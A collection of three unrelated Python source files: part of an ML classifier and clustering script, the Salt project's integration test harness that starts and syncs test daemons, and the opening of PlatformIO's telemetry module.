self.naming['to'][naming_num] = valor
naming_num += 1
row[j] = self.naming['from'][val]
continue
if val == '':
row[j] = 0
continue
try:
row[j] = float(val)
except:
self.logger.error(
"problem parsing value " + str(val))
rows.append(row)
# first column in row is the classification, Y
y = numpy.zeros(len(rows))
x = numpy.zeros((len(rows), len(rows[0]) - 1))
# shuffle it up for training
record_range = list(range(len(rows)))
shuffle(record_range)
for i in record_range:
y[i] = rows[i][0]
x[i, :] = numpy.array(rows[i][1:])
names = [
"LSTM"]
#"Linear SVM"]
classifiers = [
self.model.model_clas(configs)]
#SVC(kernel="linear", C=0.025, probability=True)]
self.algorithms = {}
for name, clf in zip(names, classifiers):
t2 = time.time()
self.logger.debug("learning {}".format(name))
try:
if name == "LSTM":
var = 0
self.algorithms[name] = self.model.train(train3D_X, train3D_y,epochs = 2,batch_size = 10,verbose=2,shuffle=True)
self.model.save()
self.algorithms[name] = 'LSTM'
else:
self.algorithms[name] = self.train(clf, x, y)
# self.logger.debug("learned {}, {:d} ms".format(name, int(1000 * (t2 - time.time()))))
except Exception as e:
self.logger.error("{} {}".format(name, str(e)))
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def save(self, save_file):
t = time.time()
save_data = {
'header': self.header,
'naming': self.naming,
'algorithms': self.algorithms,
'family': self.family
}
save_data = pickle.dumps(save_data)
put_file(f'ai_metadata/{save_file}', save_data)
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def load(self, save_file):
t = time.time()
downloaded_data = get_file(f'ai_metadata/{save_file}')
if not downloaded_data:
raise Exception('There is no AI data on S3')
saved_data = pickle.loads(downloaded_data)
self.header = saved_data['header']
self.naming = saved_data['naming']
self.algorithms = saved_data['algorithms']
self.family = saved_data['family']
self.logger.debug("{:d} ms".format(int(1000 * (t - time.time()))))
def do():
ai = AI()
ai.load()
# ai.learn()
params = {'quantile': .3,
'eps': .3,
'damping': .9,
'preference': -200,
'n_neighbors': 10,
'n_clusters': 3}
bandwidth = cluster.estimate_bandwidth(ai.x, quantile=params['quantile'])
connectivity = kneighbors_graph(
ai.x, n_neighbors=params['n_neighbors'], include_self=False)
# make connectivity symmetric
connectivity = 0.5 * (connectivity + connectivity.T)
ms = cluster.MeanShift(bandwidth=bandwidth, bin_seeding=True)
two_means = cluster.MiniBatchKMeans(n_clusters=params['n_clusters'])
ward = cluster.AgglomerativeClustering(
n_clusters=params['n_clusters'], linkage='ward',
connectivity=connectivity)
spectral = cluster.SpectralClustering(
n_clusters=params['n_clusters'], eigen_solver='arpack',
affinity="nearest_neighbors")
dbscan = cluster.DBSCAN(eps=params['eps'])
affinity_propagation = cluster.AffinityPropagation(
damping=params['damping'], preference=params['preference'])
average_linkage = cluster.AgglomerativeClustering(
linkage="average", affinity="cityblock",
n_clusters=params['n_clusters'], connectivity=connectivity)
birch = cluster.Birch(n_clusters=params['n_clusters'])
gmm = mixture.GaussianMixture(
n_components=params['n_clusters'], covariance_type='full')
clustering_algorithms = (
('MiniBatchKMeans', two_means),
('AffinityPropagation', affinity_propagation),
('MeanShift', ms),
('SpectralClustering', spectral),
('Ward', ward),
('AgglomerativeClustering', average_linkage),
('DBSCAN', dbscan),
('Birch', birch),
('GaussianMixture', gmm)
)
for name, algorithm in clustering_algorithms:
with warnings.catch_warnings():
warnings.filterwarnings(
"ignore",
message="the number of connected components of the " +
"connectivity matrix is [0-9]{1,2}" +
" > 1. Completing it to avoid stopping the tree early.",
category=UserWarning)
warnings.filterwarnings(
"ignore",
message="Graph is not fully connected, spectral embedding" +
" may not work as expected.",
category=UserWarning)
try:
algorithm.fit(ai.x)
except Exception as e:
continue
if hasattr(algorithm, 'labels_'):
y_pred = algorithm.labels_.astype(numpy.int)
else:
y_pred = algorithm.predict(ai.x)
if max(y_pred) > 3:
continue
known_groups = {}
for i, group in enumerate(ai.y):
group = int(group)
if group not in known_groups:
known_groups[group] = []
known_groups[group].append(i)
guessed_groups = {}
for i, group in enumerate(y_pred):
if group not in guessed_groups:
guessed_groups[group] = []
guessed_groups[group].append(i)
for k in known_groups:
for g in guessed_groups:
print(
k, g, len(set(known_groups[k]).intersection(guessed_groups[g])))
|
__init__.py | '''
Set up the Salt integration test suite
'''
# Import Python libs
import optparse
import multiprocessing
import os
import sys
import shutil
import pprint
import tempfile
import logging
import time
import signal
import subprocess
from hashlib import md5
from subprocess import PIPE, Popen
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
# Import Salt libs
import salt
import salt.config
import salt.master
import salt.minion
import salt.runner
import salt.output
from salt.utils import fopen, get_colors
from salt.utils.verify import verify_env
from saltunittest import TestCase, RedirectStdStreams
try:
import console
width, height = console.getTerminalSize()
PNUM = width
except:
PNUM = 70
INTEGRATION_TEST_DIR = os.path.dirname(
os.path.normpath(os.path.abspath(__file__))
)
CODE_DIR = os.path.dirname(os.path.dirname(INTEGRATION_TEST_DIR))
SCRIPT_DIR = os.path.join(CODE_DIR, 'scripts')
PYEXEC = 'python{0}.{1}'.format(sys.version_info[0], sys.version_info[1])
# Gentoo Portage prefers ebuild tests are rooted in ${TMPDIR}
SYS_TMP_DIR = os.environ.get('TMPDIR', tempfile.gettempdir())
TMP = os.path.join(SYS_TMP_DIR, 'salt-tests-tmpdir')
FILES = os.path.join(INTEGRATION_TEST_DIR, 'files')
MOCKBIN = os.path.join(INTEGRATION_TEST_DIR, 'mockbin')
TMP_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-state-tree')
log = logging.getLogger(__name__)
def print_header(header, sep='~', top=True, bottom=True, inline=False,
centered=False):
'''
Allows some pretty printing of headers on the console, either with a
"ruler" on bottom and/or top, inline, centered, etc.
'''
if top and not inline:
print(sep * PNUM)
if centered and not inline:
fmt = u'{0:^{width}}'
elif inline and not centered:
fmt = u'{0:{sep}<{width}}'
elif inline and centered:
fmt = u'{0:{sep}^{width}}'
else:
fmt = u'{0}'
print(fmt.format(header, sep=sep, width=PNUM))
if bottom and not inline:
print(sep * PNUM)
def run_tests(TestCase):
'''
Run integration tests for a chosen test case.
Function uses optparse to set up test environment
'''
from saltunittest import TestLoader, TextTestRunner
opts = parse_opts()
loader = TestLoader()
tests = loader.loadTestsFromTestCase(TestCase)
print('Setting up Salt daemons to execute tests')
with TestDaemon(clean=opts.clean):
runner = TextTestRunner(verbosity=opts.verbosity).run(tests)
sys.exit(runner.wasSuccessful())
def parse_opts():
'''
Parse command line options for running integration tests
'''
parser = optparse.OptionParser()
parser.add_option('-v',
'--verbose',
dest='verbosity',
default=1,
action='count',
help='Verbose test runner output')
parser.add_option('--clean',
dest='clean',
default=True,
action='store_true',
help=('Clean up test environment before and after '
'integration testing (default behaviour)'))
parser.add_option('--no-clean',
dest='clean',
action='store_false',
help=('Don\'t clean up test environment before and after '
'integration testing (speed up test process)'))
options, _ = parser.parse_args()
return options
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
def __init__(self, opts=None):
self.opts = opts
self.colors = get_colors(opts.no_colors is False)
def __enter__(self):
'''
Start a master and minion
'''
self.master_opts = salt.config.master_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
)
self.minion_opts = salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'minion')
)
#if sys.version_info < (2, 7):
# self.minion_opts['multiprocessing'] = False
self.sub_minion_opts = salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'sub_minion')
)
#if sys.version_info < (2, 7):
# self.sub_minion_opts['multiprocessing'] = False
self.smaster_opts = salt.config.master_config(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic_master'
)
)
self.syndic_opts = salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic'))
self.syndic_opts['_master_conf_file'] = os.path.join(
INTEGRATION_TEST_DIR,
'files/conf/master'
)
# Set up config options that require internal data
self.master_opts['pillar_roots'] = {
'base': [os.path.join(FILES, 'pillar', 'base')]
}
self.master_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
TMP_STATE_TREE
]
}
self.master_opts['ext_pillar'] = [
{'cmd_yaml': 'cat {0}'.format(
os.path.join(
FILES,
'ext.yaml'
)
)}
]
# clean up the old files
self._clean()
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
self.master_opts[optname] = optname_path
self.minion_opts[optname] = optname_path
self.sub_minion_opts[optname] = optname_path
verify_env([os.path.join(self.master_opts['pki_dir'], 'minions'),
os.path.join(self.master_opts['pki_dir'], 'minions_pre'),
os.path.join(self.master_opts['pki_dir'],
'minions_rejected'),
os.path.join(self.master_opts['cachedir'], 'jobs'),
os.path.join(self.smaster_opts['pki_dir'], 'minions'),
os.path.join(self.smaster_opts['pki_dir'], 'minions_pre'),
os.path.join(self.smaster_opts['pki_dir'],
'minions_rejected'),
os.path.join(self.smaster_opts['cachedir'], 'jobs'),
os.path.dirname(self.master_opts['log_file']),
self.minion_opts['extension_modules'],
self.sub_minion_opts['extension_modules'],
self.sub_minion_opts['pki_dir'],
self.master_opts['sock_dir'],
self.smaster_opts['sock_dir'],
self.sub_minion_opts['sock_dir'],
self.minion_opts['sock_dir'],
TMP_STATE_TREE,
TMP
],
pwd.getpwuid(os.getuid()).pw_name)
# Set up PATH to mockbin
self._enter_mockbin()
master = salt.master.Master(self.master_opts)
self.master_process = multiprocessing.Process(target=master.start)
self.master_process.start()
minion = salt.minion.Minion(self.minion_opts)
self.minion_process = multiprocessing.Process(target=minion.tune_in)
self.minion_process.start()
sub_minion = salt.minion.Minion(self.sub_minion_opts)
self.sub_minion_process = multiprocessing.Process(
target=sub_minion.tune_in
)
self.sub_minion_process.start()
smaster = salt.master.Master(self.smaster_opts)
self.smaster_process = multiprocessing.Process(target=smaster.start)
self.smaster_process.start()
syndic = salt.minion.Syndic(self.syndic_opts)
self.syndic_process = multiprocessing.Process(target=syndic.tune_in)
self.syndic_process.start()
if os.environ.get('DUMP_SALT_CONFIG', None) is not None:
from copy import deepcopy
try:
import yaml
os.makedirs('/tmp/salttest/conf')
except OSError:
pass
master_opts = deepcopy(self.master_opts)
minion_opts = deepcopy(self.minion_opts)
master_opts.pop('conf_file', None)
master_opts['user'] = pwd.getpwuid(os.getuid()).pw_name
minion_opts['user'] = pwd.getpwuid(os.getuid()).pw_name
minion_opts.pop('conf_file', None)
minion_opts.pop('grains', None)
minion_opts.pop('pillar', None)
open('/tmp/salttest/conf/master', 'w').write(
yaml.dump(master_opts)
)
open('/tmp/salttest/conf/minion', 'w').write(
yaml.dump(minion_opts)
)
self.minion_targets = set(['minion', 'sub_minion'])
self.pre_setup_minions()
self.setup_minions()
if self.opts.sysinfo:
from salt import version
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(version.versions_report()))
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
)
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
@property
def client(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because it's creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
'''
return salt.client.LocalClient(
mopts=self.master_opts
)
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
self.sub_minion_process.terminate()
self.sub_minion_process.join()
self.minion_process.terminate()
self.minion_process.join()
self.master_process.terminate()
self.master_process.join()
self.syndic_process.terminate()
self.syndic_process.join()
self.smaster_process.terminate()
self.smaster_process.join()
self._exit_mockbin()
self._clean()
def pre_setup_minions(self):
'''
Subclass this method for additional minion setups.
'''
def setup_minions(self):
# Wait for minions to connect back
wait_minion_connections = multiprocessing.Process(
target=self.wait_for_minion_connections,
args=(self.minion_targets, self.MINIONS_CONNECT_TIMEOUT)
)
wait_minion_connections.start()
wait_minion_connections.join()
wait_minion_connections.terminate()
if wait_minion_connections.exitcode > 0:
print(
'\n {RED_BOLD}*{ENDC} ERROR: Minions failed to connect'.format(
**self.colors
)
)
return False
del wait_minion_connections
sync_needed = self.opts.clean
if self.opts.clean is False:
def sumfile(fpath):
# Since we will be do'in this for small files, it should be ok
fobj = fopen(fpath)
m = md5()
while True:
d = fobj.read(8096)
if not d:
break
m.update(d)
return m.hexdigest()
# Since we're not cleaning up, let's see if modules are already up
# to date so we don't need to re-sync them
modules_dir = os.path.join(FILES, 'file', 'base', '_modules')
for fname in os.listdir(modules_dir):
if not fname.endswith('.py'):
continue
dfile = os.path.join(
'/tmp/salttest/cachedir/extmods/modules/', fname
)
if not os.path.exists(dfile):
sync_needed = True
break
sfile = os.path.join(modules_dir, fname)
if sumfile(sfile) != sumfile(dfile):
sync_needed = True
break
if sync_needed:
# Wait for minions to "sync_all"
sync_minions = multiprocessing.Process(
target=self.sync_minion_modules,
args=(self.minion_targets, self.MINIONS_SYNC_TIMEOUT)
)
sync_minions.start()
sync_minions.join()
if sync_minions.exitcode > 0:
return False
sync_minions.terminate()
del sync_minions
return True
def post_setup_minions(self):
'''
Subclass this method to execute code after the minions have been setup
'''
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
def _clean(self):
'''
Clean out the tmp files
'''
if not self.opts.clean:
return
if os.path.isdir(self.sub_minion_opts['root_dir']):
shutil.rmtree(self.sub_minion_opts['root_dir'])
if os.path.isdir(self.master_opts['root_dir']):
shutil.rmtree(self.master_opts['root_dir'])
if os.path.isdir(self.smaster_opts['root_dir']):
shutil.rmtree(self.smaster_opts['root_dir'])
if os.path.isdir(TMP):
shutil.rmtree(TMP)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write('\r' + ' ' * PNUM + '\r')
if not running and job_finished is False:
# Let's not have false positives and wait one more seconds
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else:
sys.stdout.write(
'\n {RED_BOLD}*{ENDC} ERROR: Failed to get information '
'back\n'.format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(
list(targets), 'saltutil.running', expr_form='list'
)
return [
k for (k, v) in running.iteritems() if v and v[0]['jid'] == jid
]
def wait_for_minion_connections(self, targets, timeout):
sys.stdout.write(
' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
'connect back\n'.format(
(timeout > 60 and
timedelta(seconds=timeout) or
'{0} secs'.format(timeout)),
', '.join(targets),
**self.colors
)
)
sys.stdout.flush()
expected_connections = set(targets)
now = datetime.now()
expire = now + timedelta(seconds=timeout)
while now <= expire:
sys.stdout.write('\r' + ' ' * PNUM + '\r')
sys.stdout.write(
' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(expected_connections),
**self.colors
)
)
sys.stdout.flush()
responses = self.client.cmd(
list(expected_connections), 'test.ping', expr_form='list',
)
for target in responses:
if target not in expected_connections:
# Someone(minion) else "listening"?
print target
continue
expected_connections.remove(target)
sys.stdout.write('\r' + ' ' * PNUM + '\r')
sys.stdout.write(
' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
target, **self.colors
)
)
sys.stdout.flush()
if not expected_connections:
return
time.sleep(1)
now = datetime.now()
else:
print(
'\n {RED_BOLD}*{ENDC} WARNING: Minions failed to connect '
'back. Tests requiring them WILL fail'.format(**self.colors)
)
print_header('=', sep='=', inline=True)
raise SystemExit()
def sync_minion_modules(self, targets, timeout=120):
# Let's sync all connected minions
print(
' {LIGHT_BLUE}*{ENDC} Syncing minion\'s modules '
'(saltutil.sync_modules)'.format(
', '.join(targets),
**self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets), 'saltutil.sync_modules',
expr_form='list',
timeout=9999999999999999,
)
if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
print(
' {RED_BOLD}*{ENDC} WARNING: Minions failed to sync modules. '
'Tests requiring these modules WILL fail'.format(**self.colors)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
if rdata:
for name, output in rdata.iteritems():
if not output['ret']:
# Already synced!?
syncing.remove(name)
continue
print(
' {LIGHT_GREEN}*{ENDC} Synced {0} modules: '
'{1}'.format(
name, ', '.join(output['ret']), **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
' {RED_BOLD}*{ENDC} {0} already synced??? '
'{1}'.format(name, output, **self.colors)
)
return True
class SaltClientTestCaseMixIn(object):
_salt_client_config_file_name_ = 'master'
__slots__ = ('client', '_salt_client_config_file_name_')
@property
def client(self):
return salt.client.LocalClient(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf',
self._salt_client_config_file_name_
)
)
class ModuleCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a module function
'''
def minion_run(self, _function, *args, **kw):
'''
Run a single salt function on the 'minion' target and condition
the return down to match the behavior of the raw function call
'''
return self.run_function(_function, args, **kw)
def run_function(self, function, arg=(), minion_tgt='minion', timeout=25,
**kwargs):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
know_to_return_none = ('file.chown', 'file.chgrp')
orig = self.client.cmd(
minion_tgt, function, arg, timeout=timeout, kwarg=kwargs
)
if minion_tgt not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion \'{0}\'. Command output: {1}'.format(
minion_tgt, orig
)
)
elif orig[minion_tgt] is None and function not in know_to_return_none:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get \'{0}\' from '
'the minion \'{1}\'. Command output: {2}'.format(
function, minion_tgt, orig
)
)
return orig[minion_tgt]
def run_state(self, function, **kwargs):
'''
Run the state.single command and return the state return structure
'''
return self.run_function('state.single', [function], **kwargs)
@property
def minion_opts(self):
'''
Return the options used for the minion
'''
return salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'minion')
)
@property
def sub_minion_opts(self):
'''
Return the options used for the minion
'''
return salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'sub_minion')
)
@property
def master_opts(self):
'''
Return the options used for the minion
'''
return salt.config.master_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
)
class SyndicCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a syndic based execution test
'''
_salt_client_config_file_name_ = 'syndic_master'
def run_function(self, function, arg=()):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
orig = self.client.cmd('minion', function, arg, timeout=25)
if 'minion' not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion. Command output: {0}'.format(orig)
)
return orig['minion']
class ShellCase(TestCase):
'''
Execute a test for a shell command
'''
def run_script(self, script, arg_str, catch_stderr=False, timeout=None):
'''
Execute a script with the given argument string
'''
path = os.path.join(SCRIPT_DIR, script)
if not os.path.isfile(path):
return False
ppath = 'PYTHONPATH={0}:{1}'.format(CODE_DIR, ':'.join(sys.path[1:]))
cmd = '{0} {1} {2} {3}'.format(ppath, PYEXEC, path, arg_str)
popen_kwargs = {
'shell': True,
'stdout': PIPE
}
if catch_stderr is True:
popen_kwargs['stderr'] = PIPE
if not sys.platform.lower().startswith('win'):
popen_kwargs['close_fds'] = True
def detach_from_parent_group():
# detach from parent group (no more inherited signals!)
os.setpgrp()
popen_kwargs['preexec_fn'] = detach_from_parent_group
elif sys.platform.lower().startswith('win') and timeout is not None:
raise RuntimeError('Timeout is not supported under windows')
process = Popen(cmd, **popen_kwargs)
if timeout is not None:
stop_at = datetime.now() + timedelta(seconds=timeout)
term_sent = False
while True:
process.poll()
if process.returncode is not None:
break
if datetime.now() > stop_at:
if term_sent is False:
# Kill the process group since sending the term signal
# would only terminate the shell, not the command
# executed in the shell
os.killpg(os.getpgid(process.pid), signal.SIGINT)
term_sent = True
continue
# As a last resort, kill the process group
os.killpg(os.getpgid(process.pid), signal.SIGKILL)
out = [
'Process took more than {0} seconds to complete. '
'Process Killed!'.format(timeout)
]
if catch_stderr:
return out, [
'Process killed, unable to catch stderr output'
]
return out
if catch_stderr:
if sys.version_info < (2, 7):
# On python 2.6, the subprocess'es communicate() method uses
# select which, is limited by the OS to 1024 file descriptors
# We need more available descriptors to run the tests which
# need the stderr output.
# So instead of .communicate() we wait for the process to
# finish, but, as the python docs state "This will deadlock
# when using stdout=PIPE and/or stderr=PIPE and the child
# process generates enough output to a pipe such that it
# blocks waiting for the OS pipe buffer to accept more data.
# Use communicate() to avoid that." <- a catch, catch situation
#
# Use this work around were it's needed only, python 2.6
process.wait()
out = process.stdout.read()
err = process.stderr.read()
else:
out, err = process.communicate()
# Force closing stderr/stdout to release file descriptors
process.stdout.close()
process.stderr.close()
try:
return out.splitlines(), err.splitlines()
finally:
try:
process.terminate()
except OSError as err:
# process already terminated
pass
data = process.communicate()
process.stdout.close()
try:
return data[0].splitlines()
finally:
try:
process.terminate()
except OSError as err:
# process already terminated
pass
def run_salt(self, arg_str):
'''
Execute salt
'''
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '-c {0} {1}'.format(mconf, arg_str)
return self.run_script('salt', arg_str)
def run_run(self, arg_str):
'''
Execute salt-run
'''
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '-c {0} {1}'.format(mconf, arg_str)
return self.run_script('salt-run', arg_str)
def run_run_plus(self, fun, options='', *arg):
'''
Execute Salt run and the salt run function and return the data from
each in a dict
'''
ret = {}
ret['out'] = self.run_run(
'{0} {1} {2}'.format(options, fun, ' '.join(arg))
)
opts = salt.config.master_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
)
opts.update({'doc': False, 'fun': fun, 'arg': arg})
with RedirectStdStreams():
runner = salt.runner.Runner(opts)
ret['fun'] = runner.run()
return ret
def run_key(self, arg_str, catch_stderr=False):
'''
Execute salt-key
'''
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '-c {0} {1}'.format(mconf, arg_str)
return self.run_script('salt-key', arg_str, catch_stderr=catch_stderr)
def run_cp(self, arg_str):
'''
Execute salt-cp
'''
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '--config-dir {0} {1}'.format(mconf, arg_str)
return self.run_script('salt-cp', arg_str)
def run_call(self, arg_str):
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '--config-dir {0} {1}'.format(mconf, arg_str)
return self.run_script('salt-call', arg_str)
class ShellCaseCommonTestsMixIn(object):
def test_version_includes_binary_name(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(self._call_binary_, out)
self.assertIn(salt.__version__, out)
def test_salt_with_git_version(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
from salt.utils import which
from salt.version import __version_info__
git = which('git')
if not git:
self.skipTest('The git binary is not available')
# Let's get the output of git describe
process = subprocess.Popen(
[git, 'describe'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=CODE_DIR
)
out, err = process.communicate()
if not out:
self.skipTest(
'Failed to get the output of \'git describe\'. '
'Error: {0!r}'.format(
err
)
)
parsed_version = '{0}'.format(out.strip().lstrip('v'))
parsed_version_info = tuple([
int(i) for i in parsed_version.split('-', 1)[0].split('.')
])
if parsed_version_info and parsed_version_info < __version_info__:
self.skipTest(
'We\'re likely about to release a new version. '
'This test would fail. Parsed({0!r}) < Expected({1!r})'.format(
parsed_version_info, __version_info__
)
)
elif parsed_version_info != __version_info__:
self.skipTest(
'In order to get the proper salt version with the '
'git hash you need to update salt\'s local git '
'tags. Something like: \'git fetch --tags\' or '
'\'git fetch --tags upstream\' if you followed '
'salt\'s contribute documentation. The version '
'string WILL NOT include the git hash.'
)
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(parsed_version, out)
class SaltReturnAssertsMixIn(object):
def assertReturnSaltType(self, ret):
try:
self.assertTrue(isinstance(ret, dict))
except AssertionError:
raise AssertionError(
'{0} is not dict. Salt returned: {1}'.format(
type(ret).__name__, ret
)
)
def assertReturnNonEmptySaltType(self, ret):
self.assertReturnSaltType(ret)
try:
self.assertNotEqual(ret, {})
except AssertionError:
raise AssertionError(
'{} is equal to {}. Salt returned an empty dictionary.'
)
def __return_valid_keys(self, keys):
if isinstance(keys, tuple):
# If it's a tuple, turn it into a list
keys = list(keys)
elif isinstance(keys, basestring):
# If it's a basestring , make it a one item list
keys = [keys]
elif not isinstance(keys, list):
# If we've reached here, it's a bad type passed to keys
raise RuntimeError('The passed keys need to be a list')
return keys
def __getWithinSaltReturn(self, ret, keys):
self.assertReturnNonEmptySaltType(ret)
keys = self.__return_valid_keys(keys)
okeys = keys[:]
for part in ret.itervalues():
try:
ret_item = part[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[{0!r}]'.format(k) for k in keys]), part
)
)
while okeys:
try:
ret_item = ret_item[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[{0!r}]'.format(k) for k in keys]), part
)
)
return ret_item
def assertSaltTrueReturn(self, ret):
try:
self.assertTrue(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not True. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned:\n{0}'.format(
pprint.pformat(ret)
)
)
def assertSaltFalseReturn(self, ret):
try:
self.assertFalse(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not False. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertSaltNoneReturn(self, ret):
try:
self.assertIsNone(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not None. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertInSaltComment(self, ret, in_comment):
return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertNotInSaltComment(self, ret, not_in_comment):
return self.assertNotIn(
not_in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertSaltCommentRegexpMatches(self, ret, pattern):
return self.assertInSaltReturnRegexpMatches(ret, pattern, 'comment')
def assertInSaltReturn(self, ret, item_to_check, keys):
return self.assertIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertNotInSaltReturn(self, ret, item_to_check, keys):
return self.assertNotIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertInSaltReturnRegexpMatches(self, ret, pattern, keys=()):
return self.assertRegexpMatches(
self.__getWithinSaltReturn(ret, keys), pattern
)
def assertSaltStateChangesEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
def assertSaltStateChangesNotEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertNotEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
|
telemetry.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import hashlib
import json
import os
import re
import sys
import threading
from collections import deque
from time import sleep, time
from traceback import format_exc
import click
import requests
from platformio import __version__, app, exception, util
from platformio.commands import PlatformioCLI
from platformio.compat import hashlib_encode_data, string_types
from platformio.proc import is_ci, is_container
from platformio.project.helpers import is_platformio_project
try:
import queue
except ImportError:
import Queue as queue
class TelemetryBase(object):
def __init__(self):
self._params = {}
def __getitem__(self, name):
return self._params.get(name, None)
def __setitem__(self, name, value):
self._params[name] = value
def __delitem__(self, name):
if name in self._params:
del self._params[name]
def send(self, hittype):
raise NotImplementedError()
